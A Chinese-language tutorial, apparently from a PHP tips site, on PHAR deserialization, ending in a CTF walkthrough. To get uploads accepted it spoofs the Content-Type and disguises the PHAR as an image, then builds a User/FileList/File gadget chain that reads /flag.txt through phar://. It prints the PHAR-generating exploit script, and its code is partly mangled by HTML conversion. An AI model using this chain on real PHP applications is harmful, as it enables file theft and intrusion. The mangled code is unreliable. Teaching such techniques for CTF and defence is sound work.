引文
之前将PHP反序列化的基础知识讲了一遍,不知道大家学习的怎么样了,今天给大家带来PHP反序列化的进阶知识:PHAR反序列化,也是之前本人在CTF比赛中经常遇到的一种php反序列化的进阶使用吧,下面先给大家讲一讲PHAR反序列化的前置知识。
前置知识
PHAR
在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发。phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容,这里就是我们反序列化漏洞的利用点。
接下来带大家看一下如何构造phar文件:
PHAR状态是只读的,创建一个的Phar文件需要允许写入Phar文件,这需要修改一下:
1 | php.ini:phar. readonly = Off; #php版本要大于等于5.2 |
其中php.ini为php的配置文件。
PHAR文件结构
上面简单介绍了phar的基本定义,接下来我们学习一下PHAR文件的基本结构:
A stub
phar文件的标志,具体代码为:
1 | xxx<!--?php xxx; __HALT_COMPILER();?--> |
注意的是phar文件始终要以__HALT_COMPILER();?>来进行结尾才能被识别为PHAR文件。
A manifest describing the contents
以序列化的形式存储用户自定义的meta-data,也是我们利用反序列化漏洞的点。
The file contents
压缩的文件内容。
signature
签名信息,放在文件末尾。
PHAR文件生成样例
了解了以上信息,我们就可以尝试来构建一个PHAR文件的生成,样例代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 | <!--?php class User{ var $name ; } @unlink( "XINO.phar" ); $phar = new Phar( "XINO.phar" ); $phar --->startBuffering(); $phar ->setStub( "<!--?php __HALT_COMPILER(); ?-->" ); $o = new User(); $o ->name = "XINO" ; $phar ->setMetadata( $o ); $phar ->addFromString( "test.txt" , "test" ); $phar ->stopBuffering(); ?> |
运行之后结果如下:
成功生成了名为XINO.phar的phar类型文件,我们放进010editor查看:
看到 meta-data 序列化的内容成功的保存到了文件中。我们再用phar协议去读取就好了。这里需要注意的一点是:一些文件函数 通过 phar:// 伪协议解析phar文件时都会将meta-data反序列化,例如:
1 2 3 4 | fileatime filectime filemtime file_exists file_get_contents file_put_contents file filegroup fopen fileinode fileowner fileperms is_dir is_file is_link is_executable is_readable is_writeable is_wirtble parse_ini_file copy unlink stat readfile info_file |
实战
学完上面的内容后,我们便可以尝试一下实战了,先看看利用条件:
phar文件要能够上传到服务器端
要有可用的魔术方法作为”跳板”
文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤
下面我们来看一个例题:
进去是一个登陆界面,我们注册登陆进去,发现了一个文件上传的点。要求得文件类型只能是gif/jpg/png的类型,需要抓包更改其Content-Type为image/jpeg或其它图片格式的对应字符串。抓包后会发现POST传参download处存在任意文件下载:
下载源码:index.php,delete.php,download.php,class.php
class.php:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 | <!--?php error_reporting (0); $dbaddr = "127.0.0.1" ; $dbuser = "root" ; $dbpass = "root" ; $dbname = "dropbox" ; $db = new mysqli( $dbaddr , $dbuser , $dbpass , $dbname ); class User { public $db ; public function __construct() { global $db ; $this --->db = $db ; } public function user_exist( $username ) { $stmt = $this ->db->prepare( "SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;" ); $stmt ->bind_param( "s" , $username ); $stmt ->execute(); $stmt ->store_result(); $count = $stmt ->num_rows; if ( $count === 0) { return false; } return true; } public function add_user( $username , $password ) { if ( $this ->user_exist( $username )) { return false; } $password = sha1( $password . "SiAchGHmFx" ); $stmt = $this ->db->prepare( "INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);" ); $stmt ->bind_param( "ss" , $username , $password ); $stmt ->execute(); return true; } public function verify_user( $username , $password ) { if (! $this ->user_exist( $username )) { return false; } $password = sha1( $password . "SiAchGHmFx" ); $stmt = $this ->db->prepare( "SELECT `password` FROM `users` WHERE `username` = ?;" ); $stmt ->bind_param( "s" , $username ); $stmt ->execute(); $stmt ->bind_result( $expect ); $stmt ->fetch(); if (isset( $expect ) && $expect === $password ) { return true; } return false; } public function __destruct() { $this ->db->close(); } } class FileList { private $files ; private $results ; private $funcs ; public function __construct( $path ) { $this ->files = array (); $this ->results = array (); $this ->funcs = array (); $filenames = scandir( $path ); $key = array_search ( "." , $filenames ); unset( $filenames [ $key ]); $key = array_search ( ".." , $filenames ); unset( $filenames [ $key ]); foreach ( $filenames as $filename ) { $file = new File(); $file ->open( $path . $filename ); array_push ( $this ->files, $file ); $this ->results[ $file ->name()] = array (); } } public function __call( $func , $args ) { array_push ( $this ->funcs, $func ); foreach ( $this ->files as $file ) { $this ->results[ $file ->name()][ $func ] = $file -> $func (); } } public function __destruct() { $table = '<div id="container" class="container"><div class="table-responsive">' ; $table .= '' ; foreach ( $this ->funcs as $func ) { $table .= '' ; } $table .= '' ; $table .= '' ; foreach ( $this ->results as $filename => $result ) { $table .= '' ; foreach ( $result as $func => $value ) { $table .= '' ; } $table .= '' ; $table .= '' ; } echo $table ; } } class File { public $filename ; public function open( $filename ) { $this ->filename = $filename ; if ( file_exists ( $filename ) && ! is_dir ( $filename )) { return true; } else { return false; } } public function name() { return basename ( $this ->filename); } public function size() { $size = filesize ( $this ->filename); $units = array ( ' B' , ' KB' , ' MB' , ' GB' , ' TB' ); for ( $i = 0; $size >= 1024 && $i filename); } public function close() { return file_get_contents ( $this ->filename); } } ?> <p> delete .php</p><div class = "jb51code" ><pre class = "brush:php;" ><!--?php # delete .php session_start(); if (!isset( $_SESSION [ 'login' ])) { header( "Location: login.php" ); die (); } if (!isset( $_POST [ 'filename' ])) { die (); } include "class.php" ; chdir ( $_SESSION [ 'sandbox' ]); $file = new File(); $filename = (string) $_POST [ 'filename' ]; if ( strlen ( $filename ) < 40 && $file --->open( $filename )) { $file ->detele(); Header( "Content-type: application/json" ); $response = array ( "success" => true, "error" => "" ); echo json_encode( $response ); } else { Header( "Content-type: application/json" ); $response = array ( "success" => false, "error" => "File not exist" ); echo json_encode( $response ); } ?> </pre> </div><p>简单分析一下:</p><p>创建一个user的对象,而且db变量是一个FileList对象,文件名为flag的路径。这样的话,当user对象销毁时,db变量的close方法被执行;而db变量没有close方法,这样就会触发call魔术方法(不理解的可以去看之前的文章),于是执行File对象的close方法。通过分析FileList类的析构方法可以知道,close方法执行后存在results变量里的结果会加入到table变量中被打印出来,也就是flag会被打印出来(<code> $this ->filename=flag文件</code> )。</p><p>于是我们尝试写一个生成PHAR文件的脚本:</p><div class = "jb51code" > <pre class = "brush:php;" ><!--?php class User { public $db ; } class File { public $filename ; } class FileList { private $files ; public function __construct() { $file = new File(); $file --->filename = "/flag.txt" ; $this ->files = array ( $file ); } } $a = new User(); $a ->db = new FileList(); $phar = new Phar( "XINO.phar" ); //后缀名必须为phar $phar ->startBuffering(); $phar ->addFromString( "exp.txt" , "test" ); //添加要压缩的文件 $phar ->setStub( "<!--?php __HALT_COMPILER(); ?-->" ); //设置stub $phar ->setMetadata( $a ); //将自定义的meta-data存入manifest //签名自动计算 $phar ->stopBuffering(); ?> </pre> </div><p>生成文件后将PHAR文件改文件类型然后上传,之后用PHAR协议去读取就可以得到flag。</p><p style= "text-align:center" ><img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-da4ef2e15f9f9b1cb66ca0993cf14e3e.png" ></p><p class = "maodian" ><a name= "_label3" ></a></p><h2>结语</h2><p>今天比较详细的讲了PHAR反序列化漏洞的原理以及应用方法,可能刚开始学不太好理解,可以根据之前PHP反序列化的思路去理解一下。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。</p><p>以上就是PHP开发技巧之PHAR反序列化详解的详细内容,更多关于PHP开发PHAR反序列化的资料请关注IT俱乐部其它相关文章!</p><div class = "lbd_bot clearfix" > <span id= "art_bot" class = "jbTestPos" ></span> </div><div class = "tags clearfix" > <i class = "icon-tag" ></i><p></p> <ul class = "meta-tags" > <li class = "tag item" ><a href= "http://common.jb51.net/tag/PHP/1.htm" target= "_blank" title= "搜索关于PHP的文章" rel= "nofollow noopener" >PHP</a></li> <li class = "tag item" ><a href= "http://common.jb51.net/tag/PHAR/1.htm" target= "_blank" title= "搜索关于PHAR的文章" rel= "nofollow noopener" >PHAR</a></li> <li class = "tag item" ><a href= "http://common.jb51.net/tag/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1.htm" target= "_blank" title= "搜索关于反序列化的文章" rel= "nofollow noopener" >反序列化</a></li> </ul> </div><div class = "lbd clearfix" > <span id= "art_down" class = "jbTestPos" ></span> </div><div id= "shoucang" ></div><div class = "xgcomm clearfix" > <h2>相关文章</h2> <ul> <li class = "lbd clearfix" ><span id= "art_xg" class = "jbTestPos" ></span></li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/59390.htm" title= "Thinkphp中的curd应用实用要点" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-1a1b05c64693fbf380aa1344a7812747.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/59390.htm" title= "Thinkphp中的curd应用实用要点" rel= "noopener" >Thinkphp中的curd应用实用要点</a></p> <div class = "item-info" > <div class = "js" >这篇文章主要介绍了Thinkphp中的curd应用实用要点并附上了简单的示例,是篇非常不错的文章,这里推荐给大家。</div> <p><span class = "lbtn" style= "float:right" > 2015-01-01 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/59549.htm" title= "PHP中使用SimpleXML检查XML文件结构实例" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-4f55910a645b073bc4fc65dc10dc14bd.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/59549.htm" title= "PHP中使用SimpleXML检查XML文件结构实例" rel= "noopener" >PHP中使用SimpleXML检查XML文件结构实例</a></p> <div class = "item-info" > <div class = "js" >这篇文章主要介绍了PHP中使用SimpleXML检查XML文件结构实例,本文讲解使用SimpleXML来检查一个XML文件是否符合规范的方法,需要的朋友可以参考下</div> <p><span class = "lbtn" style= "float:right" > 2015-01-01 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/55455.htm" title= "PHP中exec与system用法区别分析" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-0ea3c7666119d5615e582f823fb3fad6.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/55455.htm" title= "PHP中exec与system用法区别分析" rel= "noopener" >PHP中 exec 与system用法区别分析</a></p> <div class = "item-info" > <div class = "js" >这篇文章主要介绍了PHP中 exec 与system用法区别分析,有助于深入掌握PHP程序设计,需要的朋友可以参考下</div> <p><span class = "lbtn" style= "float:right" > 2014-09-09 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/70798.htm" title= "php自动识别文字编码并转换为目标编码的方法" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-4f96a78db829b1556ff16de21e013c7a.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/70798.htm" title= "php自动识别文字编码并转换为目标编码的方法" rel= "noopener" >php自动识别文字编码并转换为目标编码的方法</a></p> <div class = "item-info" > <div class = "js" >这篇文章主要介绍了php自动识别文字编码并转换为目标编码的方法,涉及php针对当前编码的判断与对应的编码转换实现技巧,需要的朋友可以参考下</div> <p><span class = "lbtn" style= "float:right" > 2015-08-08 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/212065.htm" title= "你真的了解PHP中的引用符号(&)吗" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-8cc1031babc6aff2319f1c6af8544aa0.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/212065.htm" title= "你真的了解PHP中的引用符号(&)吗" rel= "noopener" >你真的了解PHP中的引用符号(&)吗</a></p> <div class = "item-info" > <div class = "js" >php的引用就是在变量或者函数、对象等前面加上&符号,但PHP中的&符号你真的了解吗?真的会用吗?下面随着小编来一起学习学习吧</div> <p><span class = "lbtn" style= "float:right" > 2021-05-05 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/57529.htm" title= "PHP遍历目录函数opendir()、readdir()、closedir()、rewinddir()总结" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-0c932a99bb7b6f23c937db507070cc7b.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/57529.htm" title= "PHP遍历目录函数opendir()、readdir()、closedir()、rewinddir()总结" rel= "noopener" >PHP遍历目录函数opendir()、readdir()、 closedir ()、 rewinddir ()总结</a></p> <div class = "item-info" > <div class = "js" >这篇文章主要介绍了PHP遍历目录函数opendir()、readdir()、 closedir ()、 rewinddir ()总结,并给出了一个综合使用这些函数的例子做了一个简易文件浏览器,需要的朋友可以参考下</div> <p><span class = "lbtn" style= "float:right" > 2014-11-11 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/24137.htm" title= "Apache 配置详解(最好的APACHE配置教程)" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-cca732bf65a93ed2ec0ac80c638460fe.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/24137.htm" title= "Apache 配置详解(最好的APACHE配置教程)" rel= "noopener" >Apache 配置详解(最好的APACHE配置教程)</a></p> <div class = "item-info" > <div class = "js" >Apache的配置由httpd.conf文件配置,因此下面的配置指令都是在httpd.conf文件中修改。 </div> <p><span class = "lbtn" style= "float:right" > 2010-07-07 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/223302.htm" title= "PHP操作MySQL的常用代码段梳理与总结" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-2d9f31f2af7b675a3d153d2b7f1035a7.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/223302.htm" title= "PHP操作MySQL的常用代码段梳理与总结" rel= "noopener" >PHP操作MySQL的常用代码段梳理与总结</a></p> <div class = "item-info" > <div class = "js" >MySQL时我们常会使用的数据库语言,关于PHP操作MySQL的常用代码段小编汇总整理了一遍,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以收藏下</div> <p><span class = "lbtn" style= "float:right" > 2021-09-09 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/95109.htm" title= "php封装的表单验证类完整实例" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-b452cee8ec5cd9e58ab98eba17281e59.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/95109.htm" title= "php封装的表单验证类完整实例" rel= "noopener" >php封装的表单验证类完整实例</a></p> <div class = "item-info" > <div class = "js" >这篇文章主要介绍了php封装的表单验证类,结合完整实例形式分析了php针对表单元素正则验证与类型判定的相关操作技巧,对于php程序设计的安全性有一定参考借鉴价值,需要的朋友可以参考下</div> <p><span class = "lbtn" style= "float:right" > 2016-10-10 </span> </p></div> </div> </div> </div> </li> <li> <div class = "item-inner" > <a href= "https://www.2it.club/article/60381.htm" title= "分享下php5类中三种数据类型的区别" class = "img-wrap" target= "_blank" rel= "noopener" > <img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-f4838ec7e2d4da28e0b57d4e852dadd4.png" ></a><p></p> <div class = "rbox" > <div class = "rbox-inner" > <p><a class = "link title" target= "_blank" href= "https://www.2it.club/article/60381.htm" title= "分享下php5类中三种数据类型的区别" rel= "noopener" >分享下php5类中三种数据类型的区别</a></p> <div class = "item-info" > <div class = "js" >这篇文章主要介绍了php5类中三种数据类型的区别,需要的朋友可以参考下</div> <p><span class = "lbtn" style= "float:right" > 2015-01-01 </span> </p></div> </div> </div> </div> </li> </ul> </div><div class = "lbd clearfix mt5" > <span id= "art_down2" class = "jbTestPos" ></span> </div><p> <a href= "" ></a></p><div id= "comments" > <h2>最新评论</h2> <div class = "pd5" > <div id= "SOHUCS" sid= "art_264624" ></div> <p></p></div> <p></p></div><div class = "main-right" > <div id= "sidebar-right" > <div class = "r300 clearfix" ><span id= "side_up" class = "jbTestPos" ></span></div> <div class = "sidebox-recomm" ></div> <div class = "r300 clearfix" ><span id= "zbafer" class = "jbTestPos" ></span></div> <div class = "sidebox bor-blue" > <div class = "bor-default pb10" > <h4 class = "blue" >大家感兴趣的内容</h4> <ul class = "newsList newList-in" > <li> <em class = "no1" >1</em><a href= "https://www.2it.club/article/30489.htm" title= "php中json_decode()和json_encode()的使用方法" target= "_blank" rel= "noopener" >php中json_decode()和json_encode(</a> </li> <li> <em class = "no2" >2</em><a href= "https://www.2it.club/article/35077.htm" title= "PHP 数组和字符串互相转换实现方法" target= "_blank" rel= "noopener" >PHP 数组和字符串互相转换实现方法</a> </li> <li> <em class = "no3" >3</em><a href= "https://www.2it.club/article/138190.htm" title= "php 字符串中是否包含指定字符串的多种方法" target= "_blank" rel= "noopener" >php 字符串中是否包含指定字符串的多种方法</a> </li> <li> <em class = "no4" >4</em><a href= "https://www.2it.club/article/34745.htm" title= "PHP中使用cURL实现Get和Post请求的方法" target= "_blank" rel= "noopener" >PHP中使用cURL实现Get和Post请求的方法</a> </li> <li> <em class = "no5" >5</em><a href= "https://www.2it.club/article/14530.htm" title= "php中iconv函数使用方法" target= "_blank" rel= "noopener" >php中iconv函数使用方法</a> </li> <li> <em class = "no6" >6</em><a href= "https://www.2it.club/article/30810.htm" title= "php日期转时间戳,指定日期转换成时间戳" target= "_blank" rel= "noopener" >php日期转时间戳,指定日期转换成时间戳</a> </li> <li> <em class = "no7" >7</em><a href= "https://www.2it.club/article/19011.htm" title= "PHP 页面跳转到另一个页面的多种方法方法总结" target= "_blank" rel= "noopener" >PHP 页面跳转到另一个页面的多种方法方法总结</a> </li> <li> <em class = "no8" >8</em><a href= "https://www.2it.club/article/28864.htm" title= "PHP中文处理 中文字符串截取(mb_substr)和获取中文字符串字数" target= "_blank" rel= "noopener" >PHP中文处理 中文字符串截取(mb_substr)和获取中</a> </li> <li> <em class = "no9" >9</em><a href= "https://www.2it.club/article/15174.htm" title= "php下intval()和(int)转换使用与区别" target= "_blank" rel= "noopener" >php下 intval ()和(int)转换使用与区别</a> </li> <li> <em class = "no10" >10</em><a href= "https://www.2it.club/article/43737.htm" title= "利用phpExcel实现Excel数据的导入导出(全步骤详细解析)" target= "_blank" rel= "noopener" >利用phpExcel实现Excel数据的导入导出(全步骤详细</a> </li> </ul> </div></div> <div class = "r300 clearfix mt10" ><span id= "idctu" class = "jbTestPos" ></span></div> <div class = "sidebox bor-blue" > <div class = "bor-default pb10" > <h4 class = "blue" >最近更新的内容</h4> <ul class = "newsListA" > <li><a href= "https://www.2it.club/article/27337.htm" title= "PHP网站备份程序代码分享" target= "_blank" rel= "noopener" >PHP网站备份程序代码分享</a></li> <li><a href= "https://www.2it.club/article/126023.htm" title= "PHP实现的贪婪算法实例" target= "_blank" rel= "noopener" >PHP实现的贪婪算法实例</a></li> <li><a href= "https://www.2it.club/article/145660.htm" title= "php使用curl_init()和curl_multi_init()多线程的速度比较详解" target= "_blank" rel= "noopener" >php使用curl_init()和curl_multi_init()多线程的</a></li> <li><a href= "https://www.2it.club/article/117755.htm" title= "PHP处理bmp格式图片的方法分析" target= "_blank" rel= "noopener" >PHP处理bmp格式图片的方法分析</a></li> <li><a href= "https://www.2it.club/article/54916.htm" title= "PHP数组排序之sort、asort与ksort用法实例" target= "_blank" rel= "noopener" >PHP数组排序之sort、asort与ksort用法实例</a></li> <li><a href= "https://www.2it.club/article/88140.htm" title= "PHP登录验证码的实现与使用方法" target= "_blank" rel= "noopener" >PHP登录验证码的实现与使用方法</a></li> <li><a href= "https://www.2it.club/article/158289.htm" title= "PHP设计模式之PHP迭代器模式讲解" target= "_blank" rel= "noopener" >PHP设计模式之PHP迭代器模式讲解</a></li> <li><a href= "https://www.2it.club/article/75389.htm" title= "php实现遍历多维数组的方法" target= "_blank" rel= "noopener" >php实现遍历多维数组的方法</a></li> <li><a href= "https://www.2it.club/article/28861.htm" title= "PHP及Zend Engine的线程安全模型分析" target= "_blank" rel= "noopener" >PHP及Zend Engine的线程安全模型分析</a></li> <li><a href= "https://www.2it.club/article/244064.htm" title= "Ezpop pop序列化链反序列化知识" target= "_blank" rel= "noopener" >Ezpop pop序列化链反序列化知识</a></li> </ul> </div></div> <div class = "r300 clearfix mt10" > <span id= "idctu1" class = "jbTestPos" ></span> </div> <div class = "sidebox bor-blue" > <div class = "bor-default pb10" > <h4 class = "blue" >常用在线小工具</h4> <ul class = "newsListA" ><span id= "bctools" class = "jbTestPos" ></span></ul> </div></div> <div class = "r300 clearfix mt10" ><span id= "idctu2" class = "jbTestPos" ></span></div> <div class = "mt10 rFixedBox" > <div class = "r300 clearfix" ><span id= "r2gg" class = "jbTestPos" ></span></div> <div class = "r300 clearfix mt10" > <span id= "rbbd" class = "jbTestPos" ></span> </div> <p></p></div> <p></p></div> <p></p></div><div id= "right-share" > <div class = "right-share jb-share" id= "jb-share" > <a class = "rshare-weixin" title= "" >微信</a><br> <a rel= "nofollow noopener" class = "rshare-qzone" target= "_blank" href= "http://tougao.jb51.net/" title= "投稿" >投稿</a><br> <a rel= "nofollow noopener" class = "rshare-sqq" target= "_blank" href= "https://task.jb51.net/" title= "脚本任务" >脚本任务</a><br> <a rel= "nofollow noopener" class = "rshare-tsina" target= "_blank" href= "http://tools.jb51.net/" title= "在线工具" >在线工具</a> </div> <p> <a class = "rshare-top" onclick= "javascript:;" ></a></p> <div id= "weixin-code" class = "hide" > <div class = "popup_weixin_head" > <p>关注微信公众号</p> <div id= "code" ><img decoding= "async" src= "https://www.2it.club/wp-content/uploads/2023/01/frc-9e0af7cdeba34ecfcaec11de1b448116.jpg" ></div> <p></p></div> <p></p></div> <p></p></div><div class = "AutoCatelog" > <div class = "AutoCatelogLlist" id= "CatelogList" style= "display:none" ></div> <p></p></div><div id= "footer" > <div class = "footer-bottom" > <p> <a rel= "nofollow noopener" href= "https://www.2it.club/article/tencent://message/?uin=461478385&Site=https://www.2it.club" target= "_blank" >投诉建议</a> -<br> </p> <p>©CopyRight 2006-2022 JB51.Net Inc All Rights Reserved. IT俱乐部 版权所有</p> <p></p></div> <p></p></div><p> <script type= "text/javascript" > </script><link type= "text/css" rel= "stylesheet" href= "/jslib/syntaxhighlighter/styles/shCore.css" > <link type= "text/css" rel= "Stylesheet" href= "/jslib/syntaxhighlighter/styles/shThemeDefault.css" > <script type= "text/javascript" src= "/jslib/syntaxhighlighter/scripts2022/shHighlighter.js" ></script><script type= "text/javascript" > /*更多导航*/ $( "#nav p" ).hover( function () { $(this).addClass( "hover" ) }, function () { $(this).removeClass( "hover" ) }); if (top.location != self.location) top.location = self.location; var varwindow = $(window); $( '#content' ).find( 'img' ).each( function () { var img = this; if (img.width >= 800 && !$(this).hasClass( "nohref" )) { img.style.width = "800px" ; img.style.height = "auto" ; } });</p> <p> function sideFixed() { var scrolltop = document.body.scrollTop || document.documentElement.scrollTop; if (ww > 440) { if (550 <= scrolltop){ $( '#right-share' ).slideDown(); } else { $( '#right-share' ).slideUp(); } if (suoyin== 'ok' &&typeof cataloguetop== 'number' ){ if (cataloguetop <= scrolltop){ //$('#navCategory').css('visibility','hidden'); $( '#CatelogList' ).fadeIn(); } else { //$('#navCategory').css('visibility','visible'); $( '#CatelogList' ).fadeOut(); } } } } var ww = varwindow.width(); $( '#right-share' ).addClass( 'lefts' ); if (suoyin== 'ok' ){ $(window).resize( function () { show_suoyin(); }); var cataloguetop=$( '#navCategory' ).offset().top+$( '#navCategory' ).outerHeight(); show_suoyin(); $( function (){ cataloguetop=$( '#navCategory' ).offset().top+$( '#navCategory' ).outerHeight(); }) } $(window).scroll( function () { //rFixedBox跟随滚动 var h = varwindow.height(); var top = varwindow.scrollTop(); var rFixedBox = $( '.rFixedBox' ).prev().offset(); var fixedTop = rFixedBox.top; if (top >= fixedTop + 330) { var h1 = parseInt($( '#content' ).children( '.main' ).height()); $( '.rFixedBox' ).css({ 'position' : 'fixed' , 'top' : 0 }); } else { $( '.rFixedBox' ).css({ 'position' : 'static' , 'top' : 0 }); } /* return true;*/ </p> <p> /*右侧快捷菜单*/ sideFixed(); }); $(window).scroll();</p> <p> $( '.rshare-weixin' ).hover( function () { $( '#weixin-code' ).removeClass( 'hide' ); }, function () { $( '#weixin-code' ).addClass( 'hide' ); }); /*二维码*/ $( '#right-share .rshare-top' ).on( 'click' , function () { $( 'html,body' ).animate({ 'scrollTop' : 0 }, 500); });</p> <p> function show_suoyin() { var vww = 0; vww = varwindow.width();</p> <p> if (suoyin == "ok" ) { if (vww > 1600) { var catell = document.getElementById( "CatelogList" );</p> <p> if (vww < 1920) { catell.style.width = (((vww - 1200) / 2) - 20) + "px" ; } else { catell.style.width = "340px" ; } if (!window.suoyinobj) { window.suoyinobj = new katelog({ contentEl: 'content' , catelogEl: 'CatelogList' , linkClass: 'AutoCatelogLink' , linkActiveClass: 'CatelogActive' , supplyTop: 20, selector: [ 'h2' , 'h3' , 'h4' ], active: function (el) { //console.log(el); } }); } } else { window.suoyinobj = null; //GenerateContentList(); } } } SyntaxHighlighter.autoloader( 'applescript /jslib/syntaxhighlighter/scripts2022/shBrushAppleScript.js' , 'actionscript3 as3 /jslib/syntaxhighlighter/scripts2022/shBrushAS3.js' , 'bash shell /jslib/syntaxhighlighter/scripts2022/shBrushBash.js' , 'coldfusion cf /jslib/syntaxhighlighter/scripts2022/shBrushColdFusion.js' , 'cpp c /jslib/syntaxhighlighter/scripts2022/shBrushCpp.js' , 'obj-c objc /jslib/syntaxhighlighter/scripts2022/shBrushObjC.js' , 'c# c-sharp csharp /jslib/syntaxhighlighter/scripts2022/shBrushCSharp.js' , 'css /jslib/syntaxhighlighter/scripts2022/shBrushCss.js' , 'delphi pascal /jslib/syntaxhighlighter/scripts2022/shBrushDelphi.js' , 'diff patch pas /jslib/syntaxhighlighter/scripts2022/shBrushDiff.js' , 'erl erlang /jslib/syntaxhighlighter/scripts2022/shBrushErlang.js' , 'groovy /jslib/syntaxhighlighter/scripts2022/shBrushGroovy.js' , 'haxe hx 